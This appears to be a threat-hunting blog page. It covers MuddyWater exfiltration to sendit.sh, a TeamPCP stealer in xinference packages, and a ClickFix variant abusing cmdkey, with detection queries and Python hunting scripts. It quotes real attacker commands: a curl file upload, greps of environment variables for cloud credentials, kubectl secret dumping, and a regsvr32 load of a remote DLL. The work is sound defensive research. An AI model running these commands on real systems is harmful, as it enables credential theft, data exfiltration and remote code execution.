Posts

Showing posts from May, 2026

392. MuddyWater Abuses Sendit for Data Exfiltration

Hello everyone! I really enjoy spotting various legitimate services that attackers abuse. Today we'll look at another such example within the context of the Exfiltration to Cloud Storage technique (T1567.002). According to this report, MuddyWater (Nebulous Werewolf, Seedworm, TEMP.Zagros, Static Kitten, Mercury, TA450, Cobalt Ulster, Earth Vetala, Mango Sandstorm, Boggy Serpens) abused the sendit[.]sh service for data exfiltration. The service allows uploading files of up to 10 GB from the command line:

curl.exe -F "file=@C:\Windows\Temp\<artifact>" hxxps://sendit[.]sh

As with other similar services, you can look for suspicious communications with it - for example, cURL resolving the service's domain before an upload:

event_type: "dnsreqwin" AND dns_rname: "sendit.sh" AND proc_file_path: "curl.exe"

See you soon!

391. Hunting for TeamPCP's Stealer

Hello everyone! What do I know about stealers? They seem to be very noisy! And today we'll once again see that in action, using TeamPCP (Haze Wolf) as an example. This time, the stealer was implanted by the attackers into three versions of the xinference package (2.6.0, 2.6.1, and 2.6.2). Essentially, it collects SSH keys, various credentials, environment variables, crypto wallets, and much more, then uses cURL for exfiltration. Let's take a look at a couple of techniques the attackers used to obtain credentials. For example, they were interested in data stored in environment variables:

env | grep AWS_
env | grep -i google
env | grep -i gcloud
env | grep -i azure

This looks fairly suspicious from a detection perspective:

event_type: processcreate* AND proc_file_path: "env" AND cmdline: ("grep" AND ("aws_" OR "google" OR "azure" OR "gcloud"))

Another technique was abusing kubectl to obtain credentials:

kubectl get secrets --all-n...
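The two hunting queries above (cURL resolving sendit.sh in post 392, and env piped into grep for cloud credential variables in post 391) can be expressed as plain predicates and run over telemetry. The block below is an added example, not code from the posts or from any vendor: the event field names (event_type, proc_file_path, cmdline, dns_rname) follow the queries quoted in the posts, the "processcreatelinux" event type is an assumed name that the posts' processcreate* wildcard would cover, the sample events are constructed for this example, and the kubectl rule is this example's own guess at a hunt for the kubectl step, since the post's query for it is cut off.

```python
"""Hunting rules from posts 392 and 391, run over constructed sample telemetry."""
import re

# Constructed sample events (not real logs). Field names follow the posts' queries.
SAMPLE_EVENTS = [
    # post 392: curl.exe resolving sendit.sh ahead of an upload
    {"host": "ws01", "event_type": "dnsreqwin",
     "proc_file_path": r"C:\Windows\System32\curl.exe", "dns_rname": "sendit.sh"},
    # a browser visiting the same service: outside the scope of the post's query
    {"host": "ws01", "event_type": "dnsreqwin",
     "proc_file_path": r"C:\Program Files\Mozilla Firefox\firefox.exe", "dns_rname": "sendit.sh"},
    # curl talking to something else
    {"host": "ws02", "event_type": "dnsreqwin",
     "proc_file_path": r"C:\Windows\System32\curl.exe", "dns_rname": "example.com"},
    # post 391: env piped into grep for cloud credentials
    # ("processcreatelinux" is an assumed event_type matched by processcreate*)
    {"host": "build01", "event_type": "processcreatelinux",
     "proc_file_path": "/usr/bin/env", "cmdline": "env | grep -i azure"},
    # same binary, harmless variable lookup
    {"host": "build01", "event_type": "processcreatelinux",
     "proc_file_path": "/usr/bin/env", "cmdline": "env | grep PATH"},
    # post 391, kubectl step (constructed command; rule below is this example's assumption)
    {"host": "build01", "event_type": "processcreatelinux",
     "proc_file_path": "/usr/local/bin/kubectl", "cmdline": "kubectl get secrets"},
]


def _basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return re.split(r"[\\/]", path)[-1].lower()


def _tokens(cmdline: str) -> list[str]:
    return cmdline.lower().split()


def rule_sendit_curl(ev: dict) -> bool:
    """Post 392: cURL resolving sendit.sh, the upload service MuddyWater abused."""
    return (ev.get("event_type") == "dnsreqwin"
            and ev.get("dns_rname", "").lower().rstrip(".") == "sendit.sh"
            and _basename(ev.get("proc_file_path", "")) == "curl.exe")


CLOUD_CRED_MARKERS = ("aws_", "google", "gcloud", "azure")


def rule_env_grep_cloud(ev: dict) -> bool:
    """Post 391: env whose command line pipes into grep for cloud credential variables."""
    cmd = ev.get("cmdline", "").lower()
    return (ev.get("event_type", "").startswith("processcreate")
            and _basename(ev.get("proc_file_path", "")) == "env"
            and "grep" in _tokens(cmd)
            and any(marker in cmd for marker in CLOUD_CRED_MARKERS))


def rule_kubectl_secrets(ev: dict) -> bool:
    """Post 391, kubectl step (assumed rule): kubectl listing secrets."""
    toks = _tokens(ev.get("cmdline", ""))
    return (ev.get("event_type", "").startswith("processcreate")
            and _basename(ev.get("proc_file_path", "")) == "kubectl"
            and "get" in toks and "secrets" in toks)


RULES = {
    "T1567.002 sendit.sh via curl": rule_sendit_curl,
    "cloud creds from env": rule_env_grep_cloud,
    "kubectl secrets dump": rule_kubectl_secrets,
}


def hunt(events, rules=RULES):
    """Return (rule_name, host, event_index) for every event some rule matches."""
    hits = []
    for idx, ev in enumerate(events):
        for name, pred in rules.items():
            if pred(ev):
                hits.append((name, ev.get("host"), idx))
    return hits


if __name__ == "__main__":
    for name, host, idx in hunt(SAMPLE_EVENTS):
        print(f"[{name}] host={host} event#{idx} {SAMPLE_EVENTS[idx]}")
```

Matching on the binary's basename rather than the full path keeps the rules stable across install locations, and the negative samples (a browser resolving sendit.sh, env piped into grep for PATH) show where the posts' queries deliberately stop.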

390. A New ClickFix Variant Abuses Cmdkey

Hello everyone! Today we're going to look at another interesting variation of the Malicious Copy and Paste technique (T1204.004). This time, according to the report, the attackers prompted the victim to run the following command:

C:\WINDOWS\system32\cmd.exe /c cmdkey /add:151.245.195[.]142 /user:guest && start regsvr32 /s \\151.245.195[.]142\hi\demo.dll & REM I am not a robot – Cloudflare ID: d7f5a3335794c434

As you can see, before registering a malicious library from a remote server using regsvr32.exe, the attackers use cmdkey.exe to store credentials (the guest account) for accessing that same server; the trailing REM comment carries the "I am not a robot" text the victim is shown, so the pasted line looks like a verification step. And yes, abusing cmdkey.exe can be a good hunting opportunity - we can look for suspicious events where credentials are added to Windows Credential Manager:

event_type: "processcreatewin" AND proc_file_path: "cmdkey.exe" AND cmdline: "add"

Since administrators also use cmdkey /add legitimately, pay particular attention to targets that are bare IP addresses and to command chains where regsvr32.exe then loads a DLL from the same host. See you soon!
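The post's hunt fires on any cmdkey /add; what makes this chain stand out is that the credential target and the UNC host regsvr32 loads from are the same server, with a REM lure comment tacked on the end. The block below is an added example, not code from the post or the report: it splits a cmd.exe one-liner on its &&, || and & operators, pulls out the cmdkey /add target and the regsvr32 UNC host, and checks whether they line up. The command it analyzes is the one quoted in the post (kept defanged); the benign comparison command and the lure phrases ("not a robot", "cloudflare") are this example's own assumptions.

```python
"""Correlate cmdkey /add targets with regsvr32 UNC hosts in a cmd.exe one-liner."""
import re

# The command quoted in the post, defanged as written there.
CLICKFIX_CMD = (
    r"C:\WINDOWS\system32\cmd.exe /c cmdkey /add:151.245.195[.]142 /user:guest "
    r"&& start regsvr32 /s \\151.245.195[.]142\hi\demo.dll "
    "& REM I am not a robot – Cloudflare ID: d7f5a3335794c434"
)
# Constructed benign command for comparison: an admin saving a file-server credential.
BENIGN_CMD = r"cmdkey /add:fileserver01 /user:CORP\jdoe"

CMDKEY_ADD_RE = re.compile(r"\bcmdkey(?:\.exe)?\s+/add:(\S+)", re.I)
UNC_RE = re.compile(r"\\\\([^\\\s]+)\\\S+")   # \\host\share\file -> host
LURE_PHRASES = ("not a robot", "cloudflare")  # assumed lure markers for the REM comment


def split_chain(cmdline: str) -> list[str]:
    """Split a cmd.exe one-liner on its && / || / & operators (quoting is ignored)."""
    return [p.strip() for p in re.split(r"\s*(?:&&|\|\||&)\s*", cmdline) if p.strip()]


def analyze_cmdkey_chain(cmdline: str) -> dict:
    """Extract cmdkey targets and regsvr32 UNC hosts and report whether they overlap."""
    segments = split_chain(cmdline)
    cred_targets = [m.group(1) for seg in segments if (m := CMDKEY_ADD_RE.search(seg))]
    regsvr32_hosts = [
        m.group(1)
        for seg in segments
        if "regsvr32" in seg.lower() and (m := UNC_RE.search(seg))
    ]
    lure = any(
        seg.lower().startswith("rem")
        and any(phrase in seg.lower() for phrase in LURE_PHRASES)
        for seg in segments
    )
    overlap = {t.lower() for t in cred_targets} & {h.lower() for h in regsvr32_hosts}
    return {
        "cmdkey_add": bool(cred_targets),               # what the post's query catches
        "cred_targets": cred_targets,
        "remote_regsvr32_hosts": regsvr32_hosts,
        "creds_match_unc_host": bool(overlap),
        "lure_comment": lure,
        # verdict: credentials stored for the very host regsvr32 then loads a DLL from
        "clickfix_like": bool(cred_targets) and bool(overlap),
    }


if __name__ == "__main__":
    for label, cmd in (("post command", CLICKFIX_CMD), ("benign", BENIGN_CMD)):
        print(label, analyze_cmdkey_chain(cmd))
```

The cmdkey_add flag alone reproduces the post's query; clickfix_like is the narrower signal a triage queue wants, and the benign command shows an ordinary admin use of cmdkey /add dropping out of it.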